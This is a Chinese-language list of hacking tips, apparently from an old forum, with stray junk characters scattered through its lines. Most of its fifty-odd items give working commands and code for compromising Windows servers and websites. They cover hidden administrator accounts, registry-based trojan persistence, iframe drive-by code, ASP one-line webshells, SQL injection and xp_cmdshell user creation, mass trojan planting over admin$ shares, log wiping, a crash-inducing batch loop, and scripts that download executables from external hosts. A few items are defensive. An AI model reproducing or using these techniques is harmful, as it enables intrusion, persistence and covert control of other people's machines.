Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
% Q# @* \" n' N0 V4 Jcacls C:\windows\system32 /G hqw20:R. Q5 G6 X' G9 H* l) ]5 K( `
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入" B8 j* E' r3 A
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
$ \2 a: X8 S5 l, k) a3 l& j- ^$ Z9 Z
6 d3 A1 O0 s# k$ H7 \; G4 d2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
- D2 O5 E% h2 t: c2 K, m$ f" q, _7 l R
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。+ w7 V# ^1 F! ^# T7 ~: x, E
' Q3 [- ^# K$ h! N0 G+ e4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号* O1 j1 V) o, m. w
; O! P" C8 W+ t
5、利用INF文件来修改注册表+ P; X9 Q' L8 _) r: M) g
[Version]" j) ^2 j2 X; T& c" Z6 G
Signature="$CHICAGO$"8 Q8 C2 x- X5 I' `$ g4 N2 G: C+ O/ s
[Defaultinstall]
) o; w9 x) ?' a$ h4 s9 }9 s4 D* vaddREG=Ating
: ^7 V ]3 ]2 G/ m8 @6 w[Ating]
1 m$ y/ l0 t0 ]2 Y0 PHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"8 x7 [0 q8 D9 r: i
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
* j. @: Y" @1 Q! x9 O' Irundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径, j/ l5 \# a5 q- C( i
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
: O" |# o4 A7 P9 ^HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
% F9 y1 Q- }/ m$ rHKEY_CURRENT_CONFIG 简写为 HKCC
* x* T+ N7 b; ?2 R7 n: E0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
/ O8 T; Q: V' s"1"这里代表是写入或删除注册表键值中的具体数据
: J- ~- j. b2 u2 W) O( ?& K* y7 Q. X) |
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
: x7 [+ T( [0 |多了一步就是在防火墙里添加个端口,然后导出其键值
0 G* S) V/ I6 `& s0 X: V$ ^[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]0 v; k! @1 }$ x, p- q* s
0 N# l4 f8 b& g# Q! O6 @; d
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽, p; r7 Q( N7 z! ^) C/ D9 d- Z* X
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
) R2 A$ B2 K5 h4 o" b8 E4 @+ T! f; q" c! U& N7 Q' N
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。$ E; `7 T% [* s
' Y$ V! }, w! k: s& F( I( k- Z9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
& I- q: T$ u2 m( z可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
( _# @, {5 t- n M& D6 a( d) E( W: n$ Q' }1 v% K' f" X" |: S$ j
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”' P% X! U- X3 K# h. L
1 Y3 }3 D, d' [& K& h% A2 c
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,9 _2 y7 h$ X9 b! V ]$ [
用法:xsniff –pass –hide –log pass.txt
7 A. B5 }: W6 S- U: i. J6 Z' I
+ `# k5 _. s+ q8 ?# @12、google搜索的艺术
! T4 k/ r8 Q* e搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
; B' E+ b: K9 r2 F% F4 ^' G或“字符串的语法错误”可以找到很多sql注入漏洞。! }5 P8 e: I1 ] ]3 M# v
% F' j$ j9 _( v" ~13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。. S8 u3 ]+ k) N- f
) Q0 A' L Y4 H
14、cmd中输入 nc –vv –l –p 1987
) l0 K3 ?! v G$ |2 u d做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃1 p5 s9 H9 }2 O8 X
' \8 ?4 l& X+ X! K
15、制作T++木马,先写个ating.hta文件,内容为& h4 d# A! B, q+ G K9 d* P5 D6 P$ u
<script language="VBScript">3 s# ?+ `; F: [ q( w
set wshshell=createobject ("wscript.shell" )
7 ]/ w: z$ v% f% z7 X- v( P! J* t& `" Wa=wshshell.run("你马的名称",1)
5 k& ~! t# \0 R. S# ~$ Dwindow.close7 A9 t8 U+ `+ k& p! o2 s
</script>/ K2 l o! w6 \" T9 q) E
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。$ x+ e' t/ h9 [+ c9 {# ^9 y$ T
& T6 X, u# J4 M0 h/ f6 E7 E16、搜索栏里输入
+ L. D8 |! H. _; q( k' q6 V6 B关键字%'and 1=1 and '%'='9 c4 Y- a2 `. a3 B6 I' L9 [
关键字%'and 1=2 and '%'='- w) T% V+ L9 e" n
比较不同处 可以作为注入的特征字符
9 @4 |, X$ T! C3 P" V
) h% `( R. V* Z$ s17、挂马代码<html>
. C9 ]4 \6 V" o1 u' h. \ I+ m4 R<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
$ d# e5 Z7 d6 C% H) |# u</html>
+ G1 \2 H0 z$ e8 L' x6 H* S7 o. x: i7 X0 H8 t+ W( j1 _# o" Y E
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
+ P m# I7 v( n; Unet localgroup administrators还是可以看出Guest是管理员来。
/ o& ~. R; y9 I$ d
9 ]) \6 U+ _2 P% H$ L19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
' r/ L" U# i. M* E$ L* T用法: 安装: instsrv.exe 服务名称 路径7 L/ h0 v6 [* s
卸载: instsrv.exe 服务名称 REMOVE& G* g8 g: l+ Q, W) f
5 m c* Q" _) _; g; Q" ~/ q
: r7 w& b" H# u: Z21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
" l4 {( e: a$ U" E' U9 }不能注入时要第一时间想到%5c暴库。, h- a, g1 V3 ] m$ m: r( I
- c8 _& h2 h$ L! T0 a9 n& k5 _) o
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
& c8 I! z3 K% u) P# n5 z/ Q; l% t6 y$ w. a8 Z9 v d
23、缺少xp_cmdshell时) x9 ~* T6 z& M+ Q! l
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'# D9 Z5 E2 t" U; {
假如恢复不成功,可以尝试直接加用户(针对开3389的)8 C1 u0 i' o, V U- u
declare @o int' U, G0 Q0 N' Y4 d3 m
exec sp_oacreate 'wscript.shell',@o out
) ]) H# D9 _* O% E! ?) ]3 lexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
( a1 ^+ {: G2 D7 X8 ]1 T& Z3 q* ~" x: |
24.批量种植木马.bat
1 c8 T9 h8 T9 f l% m! O Efor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中) `2 x1 n* [3 e U4 _* V
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
& g* |2 n e$ D* p( u* l6 Y扫描地址.txt里每个主机名一行 用\\开头
& H! g# I. f2 O, R+ L5 i+ S3 j
: ]( @% S4 A' W H) d1 [25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
* ~# W/ s+ z* }( w0 o. b1 C1 L0 t% Q$ R; d& J7 y
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.- V3 Y+ t8 a- [: e+ J5 C2 y3 J) d- R
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.1 a* V/ e" X, y
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
2 L$ u$ [% a6 j$ H6 y: E. f6 `
* K- D8 Y/ Y) R4 _0 A, b: ^. E27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
# v! M4 z- m. A! X, ^( F) Q1 D2 s然后用#clear logg和#clear line vty *删除日志
5 K4 R, N7 `0 H5 ~, ^9 U2 ]2 H1 C2 p. z( j
28、电脑坏了省去重新安装系统的方法. w9 n+ v+ U) ^% B( N# J# D( Y
纯dos下执行,
3 ]- k, E h" q& ~/ J! ?* Z# txp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config* C: _' T* Z1 A9 _
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config; r9 M5 L; t; R# B+ }
0 |* R( |7 |9 P/ s: ?! F! v! F8 y+ o29、解决TCP/IP筛选 在注册表里有三处,分别是:
5 }' f6 W! _5 IHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
( Z* d2 Q. R. U5 b$ ^0 C: rHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
; V6 O( q& S9 p+ f+ w) QHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
' x# ]' Q( ^! A* I% c, t+ U, B3 B- J分别用& k, }5 m# z7 }2 F+ ?
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip& G8 [# x$ E1 d8 I
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
( _8 j4 e) ?, h3 Pregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip' K$ t% i2 `7 k7 x
命令来导出注册表项
6 ]. O6 b( G) [- n9 T- O5 e然后把三个文件里的EnableSecurityFilters"=dword:00000001,
' U- u, \3 r# W( L( P9 y改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用" B* w* \! G& w p( t: x& [: ~4 A
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
; m, Z! v# F/ a5 Y3 y! ]" ^2 b& k; b" [# g
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U- Z* U2 w/ h) M* n
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
5 ^& y: h" b8 N4 l5 u- u. s- g* j( B: V
4 S* m/ B1 ]( x. A31、全手工打造开3389工具% y* a9 y; t! v1 A
打开记事本,编辑内容如下:
" L: J$ V4 P" c7 X8 [/ @echo [Components] > c:\sql
6 |1 g3 c8 U1 Q) B7 S6 Gecho TSEnable = on >> c:\sql
9 B* `5 w; I8 |8 f/ E& L bsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
) _& {7 G, l1 N编辑好后存为BAT文件,上传至肉鸡,执行
$ L+ }9 d/ T* [( U
: u6 W6 x8 z% g: W; c1 c! J& F32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马6 [; M1 l1 G( b: a
, v: ]* S" U# ~1 v33、让服务器重启( x+ X }" v3 h4 b5 @
写个bat死循环:4 e Z1 q/ G2 H3 m: Y. Z W; K' b
@echo off
' V( N5 e+ l. p0 y- N9 u! l:loop1
4 Y+ ^( l4 R/ A( J5 rcls4 e9 @4 R& ?; S2 g& x
start cmd.exe
! o) ?- P7 F; h: _goto loop16 z* z. k% x+ e) f( R
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
8 Y2 z; z; S2 p8 I
) M# D8 W; v$ _+ h3 U/ n5 h. N% o34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
7 E7 }" Z2 M O! w( l5 `@echo off
- M( y# Y# _1 ^' `5 v( Ndate /t >c:/3389.txt$ n5 e, [ M( Q" ~0 w+ f5 W/ E% ~5 F
time /t >>c:/3389.txt
! ^* N* E) s* g' w& n5 k7 w6 Oattrib +s +h c:/3389.bat
( `1 ^6 e( X: w: r% _" @9 H8 Zattrib +s +h c:/3389.txt
x/ w( D5 L. wnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
4 V8 G s# O) X7 x4 E+ S并保存为3389.bat' R3 a) Z( D( L/ z5 Q7 Y
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
( _) |: R9 {# C. y0 ?
2 U, _1 h( f: l$ M0 f35、有时候提不了权限的话,试试这个命令,在命令行里输入:% f9 V$ R+ u6 ]) |" u+ G
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)0 o; U3 L6 U1 f% \8 J
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
( [3 `+ u: F; @6 z
, Y1 i7 s5 W! W+ v! x36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件- B/ Q8 T2 X- w
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
1 Y4 i; d& f3 {# Y( `echo 你的FTP账号 >>c:\1.bat //输入账号' B& T p& h4 s* i+ [% Y
echo 你的FTP密码 >>c:\1.bat //输入密码' c) r# M# u- l& u
echo bin >>c:\1.bat //登入
8 v( H+ W) J! B/ K" ?6 u: H; Gecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
% ~$ {* E% U2 _3 yecho bye >>c:\1.bat //退出1 |$ [% i0 }7 H9 i( Q
然后执行ftp -s:c:\1.bat即可
: x. `6 W% D! O) G- z# S. P& Y( G9 p+ C/ @! q3 f9 _
37、修改注册表开3389两法
: w, {( L$ X/ g! K' X(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
5 d' a; c$ Q* D4 J* o R% ]echo Windows Registry Editor Version 5.00 >>3389.reg# Y- o. Y0 c, c0 {, A$ J/ e
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
1 s- s' j* v% G% }( Recho "Enabled"="0" >>3389.reg
4 m3 j# P. V2 |8 Jecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows& G6 Y! `( @1 g: a) c# Y u
NT\CurrentVersion\Winlogon] >>3389.reg
! L+ h3 n1 S) i% p/ gecho "ShutdownWithoutLogon"="0" >>3389.reg
! \" B' O0 ^ x. o, H! G1 Becho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]; {* _6 t9 I5 u: y
>>3389.reg! i9 f. h' y" c5 d7 F2 ] I
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg3 F' C3 s) ?; V/ s' b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] h: [* o9 z5 O/ h4 a& k9 F
>>3389.reg+ A; T9 l, d5 ^# r" u
echo "TSEnabled"=dword:00000001 >>3389.reg
3 G) v5 R2 a# m# g2 R$ Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
, {' N0 s0 u1 _) e& Fecho "Start"=dword:00000002 >>3389.reg
+ ]2 p9 u( ]6 D- X1 U( W `- v2 n: Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] Y) J4 E$ v" P; |8 m
>>3389.reg: B% L) R4 X/ L: A3 _5 Z* m, V# L1 \
echo "Start"=dword:00000002 >>3389.reg8 y; l2 B% P! t
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
9 |' Z) n6 i' l5 }echo "Hotkey"="1" >>3389.reg0 g' I" o) y% U& i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 H& M- v7 h0 S9 G3 hServer\Wds\rdpwd\Tds\tcp] >>3389.reg
7 Q' a2 W# _2 aecho "PortNumber"=dword:00000D3D >>3389.reg
! H: |1 t, a( p- H. {0 f5 eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 M! \. q0 q( n6 l ]* Y
Server\WinStations\RDP-Tcp] >>3389.reg* {, u4 F( p5 t" ^6 g) I' A
echo "PortNumber"=dword:00000D3D >>3389.reg. q0 l( }- K" f0 ~
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。7 [9 M3 l$ B# M; C1 v
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
2 |5 B! ]% I7 v7 ^因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
; V1 R5 v1 i& f4 ]! {(2)winxp和win2003终端开启( d7 I, L* D) y d& L: m' G1 e
用以下ECHO代码写一个REG文件:
4 e; p: A4 L4 L" _8 q7 u* B Q4 \* V3 x% ^echo Windows Registry Editor Version 5.00>>3389.reg
: c' ]% i* D7 r' ]: [5 zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# {1 {2 @; L% D0 UServer]>>3389.reg' T: J$ [: b5 K. Q1 c
echo "fDenyTSConnections"=dword:00000000>>3389.reg
! m+ x1 p' D5 B. s& a+ I. _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ \4 c. @# Q, w) k s, t/ L2 JServer\Wds\rdpwd\Tds\tcp]>>3389.reg
2 J X& A5 N9 P/ N R* H Cecho "PortNumber"=dword:00000d3d>>3389.reg" ]; H8 d- L& w6 v/ [7 t) X9 g' J$ M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) E5 n$ B/ Y" @5 |9 g) I
Server\WinStations\RDP-Tcp]>>3389.reg9 f6 p- r. j* {5 I( C7 k
echo "PortNumber"=dword:00000d3d>>3389.reg! j* i2 ? k z' N- h
然后regedit /s 3389.reg del 3389.reg
9 U1 p& [* b. D- g: bXP下不论开终端还是改终端端口都不需重启
. _8 Q, j4 a* p( _! ]. l5 `
0 a) w1 I! ~; f# V38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
( Q- ?; L# ]: s2 w) ?5 J3 S7 n" j用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
u4 t3 ?" {" l/ X
$ w! q1 M/ h# J39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!+ w+ Y/ P5 {5 E G, Z/ m
(1)数据库文件名应复杂并要有特殊字符
' ]8 `; A& @8 G+ W4 A(2)不要把数据库名称写在conn.asp里,要用ODBC数据源. Q8 g! g% \. `
将conn.asp文档中的7 a5 F0 d7 O# N. j
DBPath = Server.MapPath("数据库.mdb"). Z( t7 l) N$ h, M* \$ N
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath% u( W) {* x1 R, |# x& K R) J
6 n# f/ t! {. s0 b- L1 E修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
9 u4 E) M. M7 ^$ U8 w& W(3)不放在WEB目录里# m2 B) j: I% R" Z, i
& Z J5 z+ w& Q
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉" d( G3 O/ @+ D7 i" O
可以写两个bat文件& j/ r, N) c4 I, A% k+ ^
@echo off! r3 [( J" D4 F( {3 ~3 N
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe2 y6 z* D- W- a9 ?3 r+ u Y
@del c:\winnt\system32\query.exe4 C3 Z/ T; u3 C" v4 X- k t0 |
@del %SYSTEMROOT%\system32\dllcache\query.exe. B7 k: N; g# R# \
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的0 ^0 S) M2 S! I, K3 z2 t; v
% M {4 Y. O! D i@echo off( f! j! Y* K" Q8 P
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
( O4 E0 L) L7 l5 f5 t@del c:\winnt\system32\tsadmin.exe
/ g H$ }. x" j( u7 |& O8 Z@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex: e! t4 L- N- a% V
- `! B; I) N5 m4 L% n* p, } |41、映射对方盘符4 W4 [7 Q2 f# i) F' {, o
telnet到他的机器上,' c/ I8 B0 |. C/ \% e7 n, P2 Q1 a
net share 查看有没有默认共享 如果没有,那么就接着运行6 z* z1 r, M q4 g) x1 M
net share c$=c:
d, P# ?, t, Q; z8 G8 G& tnet share现在有c$4 ^% d z" K- \! g+ A. I
在自己的机器上运行# @( u7 w+ V9 ?3 q2 E$ s5 x
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K- P6 [4 q6 W; F6 ~ H
3 H! I- R& }6 t
42、一些很有用的老知识& p: u: H* \& s- f5 @
type c:\boot.ini ( 查看系统版本 )
, h/ D6 O0 _. }5 n$ C, gnet start (查看已经启动的服务)
7 D. l0 t% `) P- h% ~query user ( 查看当前终端连接 )% {8 F7 e+ ]" s z# O! m: h, I/ u. C
net user ( 查看当前用户 )2 k4 t" }8 Z3 f/ T& B1 @
net user 用户 密码/add ( 建立账号 )* H2 x+ S* a/ I8 L/ t( U0 K8 F
net localgroup administrators 用户 /add (提升某用户为管理员)
3 e1 O) ~- D, gipconfig -all ( 查看IP什么的 )4 Z" d# M2 V9 S* T$ `$ m8 O
netstat -an ( 查看当前网络状态 )$ C) o9 U% |' U: s, }: ]
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
: `6 O+ f2 E4 `克隆时Administrator对应1F4
' e+ c8 D5 @ y1 B9 Bguest对应1F5" I" F$ q) q! ]1 P3 u
tsinternetuser对应3E8
; Z! S, h5 y7 g$ m& r8 |0 a/ Q6 I; Q
43、如果对方没开3389,但是装了Remote Administrator Service+ O/ g, e4 W% s+ S
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
3 a1 p- x( e& p: K7 W* z解释:用serv-u漏洞导入自己配制好的radmin的注册表信息% U' _# {/ d' {3 F' u
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin". |; I$ l9 n2 q! A1 `2 D
3 }& W" ~4 ?3 J8 T8 w% ^/ Y6 H
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
/ r. Q4 T1 l! a( ]# o. e6 j1 A6 d本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口); v( Q; l. z$ }9 ?4 B) a
3 I7 p' Q k* g- Q45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
/ G; M8 \1 ]9 x2 J. Yecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open: q( h7 y$ ]6 a# I# d+ W
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =2 ?* }/ k8 E/ W8 ], Q9 a
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =9 {8 X% I8 q: a" E
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs5 y7 }0 v' X3 `* H
(这是完整的一句话,其中没有换行符)
' x% r; X* z7 g) E8 O; o& C- Y然后下载:& [% D) l8 m: Q2 y, [, G
cscript down.vbs http://www.hack520.org/hack.exe hack.exe& X, |8 V# s# P8 J# V* L% E5 J$ \/ t8 b7 s
, ]' ]% G/ W, B; G3 d1 `9 n46、一句话木马成功依赖于两个条件:; w8 P1 M9 |8 t, }, z5 C
1、服务端没有禁止adodb.Stream或FSO组件
! T: u. W" _8 e$ ~1 _2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。0 N2 ]1 a/ {+ {5 d4 \8 ^
. f% E- p* h0 q% M& y/ {
47、利用DB_OWNER权限进行手工备份一句话木马的代码:$ E R% b# K$ o) }' c9 k5 T
;alter database utsz set RECOVERY FULL--- b- J8 v, J5 I8 r4 D1 [6 R# ^
;create table cmd (a image)--
5 C8 g- e& U3 \1 T% O4 S3 ?6 z;backup log utsz to disk = 'D:\cmd' with init--
9 D. }0 d/ h4 s, G1 e1 H;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
; k. q z1 ^$ n9 M( u6 ?/ ?0 O;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--3 _6 ]8 p% m# R! N u
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。0 c2 G5 e1 k, G% n3 R5 d$ c
2 O7 ]- M# a2 ] J# t% @
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
* N {9 v/ d: j" s' j/ W( i/ @
1 r! ^9 L: E4 o* e9 Q* W/ r用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options3 D2 k2 |$ S% Z' `+ _9 i
所有会话用 'all'。) f6 t& o% i5 p$ V, I" q' I
-s sessionid 列出会话的信息。# |$ [! j1 b+ e
-k sessionid 终止会话。
( b4 A ?- G9 U; S-m sessionid 发送消息到会话。1 t0 j# |. ^# \& {
! n7 {" S. V/ N* Lconfig 配置 telnet 服务器参数。: M3 q% h7 m" X# B/ x! I
3 f& ? b# J- C- y- L) l; o
common_options 为:
! \& K% s8 r9 B# |2 ^-u user 指定要使用其凭据的用户. P( y& {) f& m7 ^' J+ F
-p password 用户密码
* J U! k3 Q, P
& \3 g' V# B4 x/ ]! h0 }config_options 为:
) o: O: l& t0 kdom = domain 设定用户的默认域
9 H& }7 W! l. p0 tctrlakeymap = yes|no 设定 ALT 键的映射: Q/ L. s' G: Z/ J; y/ O) B0 t u8 j
timeout = hh:mm:ss 设定空闲会话超时值
6 ^/ l2 |5 H+ F& ?/ e. D& Xtimeoutactive = yes|no 启用空闲会话。
" V/ C) u7 o' _$ w5 l8 u! g) y' E5 |" qmaxfail = attempts 设定断开前失败的登录企图数。
# b. D$ o, x" \maxconn = connections 设定最大连接数。
# w+ S! V, w0 b5 y* D! ^port = number 设定 telnet 端口。" Y: y6 c& ]5 c' f; M: L) I5 `2 C
sec = [+/-]NTLM [+/-]passwd
) c3 \ p8 y! `8 H+ ]: d6 W设定身份验证机构8 A9 _% ?) D( }3 p7 I5 F
fname = file 指定审计文件名。) ~* f- \0 W" H" N) E6 m9 H& d
fsize = size 指定审计文件的最大尺寸(MB)。
& f7 {, X; N" G; E- x' e$ }+ e/ qmode = console|stream 指定操作模式。& u! ~4 \8 ?; q2 h" U
auditlocation = eventlog|file|both! P! f+ V, @. k ]: D
指定记录地点: ^3 p& u: l" [$ y& N+ l- c
audit = [+/-]user [+/-]fail [+/-]admin' q6 |3 ^0 v9 Z
* b( _6 A; f D" d# m- r& ?49、例如:在IE上访问:
, Q, n" k$ r8 Y2 ^# t" [www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
- ~9 ?6 h$ y( D0 V' Xhack.txt里面的代码是:
& i6 `5 }! ]* ? {5 J& t<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
; v) ~/ C* @2 r7 q把这个hack.txt发到你空间就可以了!8 _& @! V# G* u- Y0 F
这个可以利用来做网马哦!. {# H Z; O2 g" u, E. k" y! Z
$ B0 w6 f) O; ?; W0 Z
50、autorun的病毒可以通过手动限制!7 k6 R; ~' i' B, t" S7 E0 m6 m
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
; F2 t6 {- O) ~* ^& _' D2,打开盘符用右键打开!切忌双击盘符~" J: {4 c H9 r5 s% f+ i
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!9 _- c9 L5 C0 U- Q' X( s' [' f* z
; l3 b5 s5 p( Z% {- D; d
51、log备份时的一句话木马:
! \' X' B, K- t% Ua).<%%25Execute(request("go"))%%25>
8 g: R0 e! }& S9 h sb).<%Execute(request("go"))%>
# t& T/ ^0 ~+ m7 v, m1 a2 Sc).%><%execute request("go")%><%; W& N8 ?3 F" K' _0 B! x
d).<script language=VBScript runat=server>execute request("sb")</Script>
7 N7 ?/ N7 Z" k% pe).<%25Execute(request("l"))%25>
h& d: |& k; W( r. A' t5 V8 Of).<%if request("cmd")<>"" then execute request("pass")%>
4 V, G" [. p1 g6 I( g8 m: X, R- \0 [* z4 q, _
